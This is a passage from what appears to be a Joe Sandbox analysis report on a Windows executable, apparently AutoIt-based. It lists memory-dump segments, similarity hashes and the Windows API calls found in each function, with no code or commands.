          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: 8c9a71e473aa7cf3ba4157998706c4db5c66dc24a273c7bfbee9c80ff7309463
          • Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
          • Opcode Fuzzy Hash: 8c9a71e473aa7cf3ba4157998706c4db5c66dc24a273c7bfbee9c80ff7309463
          • Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A
          APIs
            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
          • DestroyAcceleratorTable.USER32 ref: 0047094A
          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
          • DeleteObject.GDI32(?), ref: 00470A04
          • DestroyIcon.USER32(?), ref: 00470A1C
          • DeleteObject.GDI32(?), ref: 00470A34
          • DestroyWindow.USER32 ref: 00470A4C
          • DestroyIcon.USER32(?), ref: 00470A73
          • DestroyIcon.USER32(?), ref: 00470A81
          • KillTimer.USER32 ref: 00470B00
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
          • String ID:
          • API String ID: 1237572874-0
          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
          APIs
          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
          • VariantInit.OLEAUT32(?), ref: 004793E1
          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
          • VariantCopy.OLEAUT32(?,?), ref: 00479461
          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
          • VariantClear.OLEAUT32(?), ref: 00479489
          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
          • VariantClear.OLEAUT32(?), ref: 004794CA
          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
          • String ID:
          • API String ID: 2706829360-0
          • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
          • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
          APIs
          • GetKeyboardState.USER32(?), ref: 0044480E
          • GetAsyncKeyState.USER32 ref: 00444899
          • GetKeyState.USER32(000000A0), ref: 004448AA
          • GetAsyncKeyState.USER32 ref: 004448C8
          • GetKeyState.USER32(000000A1), ref: 004448D9
          • GetAsyncKeyState.USER32 ref: 004448F5
          • GetKeyState.USER32(00000011), ref: 00444903
          • GetAsyncKeyState.USER32 ref: 0044491F
          • GetKeyState.USER32(00000012), ref: 0044492D
          • GetAsyncKeyState.USER32 ref: 00444949
          • GetKeyState.USER32(0000005B), ref: 00444958
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: State$Async$Keyboard
          • String ID:
          • API String ID: 541375521-0
          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: InitVariant$_malloc_wcscpy_wcslen
          • String ID:
          • API String ID: 3413494760-0
          • Opcode ID: 1ab2936692a4ba517b01095c64a47ec92554b1c4023677b0bc6ac530829d43e7
          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
          • Opcode Fuzzy Hash: 1ab2936692a4ba517b01095c64a47ec92554b1c4023677b0bc6ac530829d43e7
          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressProc_free_malloc$_strcat_strlen
          • String ID: AU3_FreeVar
          • API String ID: 2634073740-771828931
          • Opcode ID: 6e952bee092962a0326b47d8634ce051d634ba9858237c5f872e92122fad1770
          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
          • Opcode Fuzzy Hash: 6e952bee092962a0326b47d8634ce051d634ba9858237c5f872e92122fad1770
          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
          APIs
          • CoInitialize.OLE32 ref: 0046C63A
          • CoUninitialize.OLE32 ref: 0046C645
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
          • IIDFromString.OLE32(?,?), ref: 0046C705
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
          • API String ID: 2294789929-1287834457
          • Opcode ID: 384a9b08eb26d63ade1dc0a9d9f3d6315ee874205d523a3df41c01c88460374a
          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
          • Opcode Fuzzy Hash: 384a9b08eb26d63ade1dc0a9d9f3d6315ee874205d523a3df41c01c88460374a
          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
          APIs
            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
            • Part of subcall function 00456391: GetAsyncKeyState.USER32 ref: 00456400
            • Part of subcall function 00456391: GetAsyncKeyState.USER32 ref: 00456410
          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
          • ImageList_EndDrag.COMCTL32 ref: 00471169
          • ReleaseCapture.USER32 ref: 0047116F
          • SetWindowTextW.USER32 ref: 00471206
          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
          • String ID: @GUI_DRAGFILE$@GUI_DROPID
          • API String ID: 2483343779-2107944366
          • Opcode ID: 038dcd04e55ec5c438f21b4de5b1dce7b91b6dae1b9492eacb09f34ba24fe95b
          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
          • Opcode Fuzzy Hash: 038dcd04e55ec5c438f21b4de5b1dce7b91b6dae1b9492eacb09f34ba24fe95b
          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
          APIs
          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
          • _wcslen.LIBCMT ref: 00450720
          • _wcscat.LIBCMT ref: 00450733
          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$Window_wcscat_wcslen
          • String ID: -----$SysListView32
          • API String ID: 4008455318-3975388722
          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
          APIs
          • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
          • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
          • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
          • __wsplitpath.LIBCMT ref: 00433E6D
          • _wcscat.LIBCMT ref: 00433E80
          • __wcsicoll.LIBCMT ref: 00433E90
          • CloseHandle.KERNEL32(00000000), ref: 00433EC8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
          • String ID: I=D
          • API String ID: 2903788889-2605949546
          • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
          • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
          • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
          • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
          • GetDlgCtrlID.USER32 ref: 00469C84
          • GetParent.USER32 ref: 00469C98
          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
          • GetDlgCtrlID.USER32 ref: 00469CA5
          • GetParent.USER32 ref: 00469CBC
          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$CtrlParent$_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 2360848162-1403004172
          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
          • GetDlgCtrlID.USER32 ref: 00469E82
          • GetParent.USER32 ref: 00469E96
          • SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
          • GetDlgCtrlID.USER32 ref: 00469EA3
          • GetParent.USER32 ref: 00469EBA
          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$CtrlParent$_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 2360848162-1403004172
          • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
          • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
          • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
          • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
          • String ID:
          • API String ID: 262282135-0
          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
          APIs
          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$LongWindow
          • String ID:
          • API String ID: 312131281-0
          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
          APIs
            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
          • SendMessageW.USER32(750A0E13,00001001,00000000,?), ref: 00448E16
          • SendMessageW.USER32(750A0E13,00001026,00000000,?), ref: 00448E25
            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$BrushCreateDeleteObjectSolid
          • String ID:
          • API String ID: 3771399671-0
          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
          APIs
          • GetCurrentThreadId.KERNEL32 ref: 00434643
          • GetForegroundWindow.USER32 ref: 00434655
          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
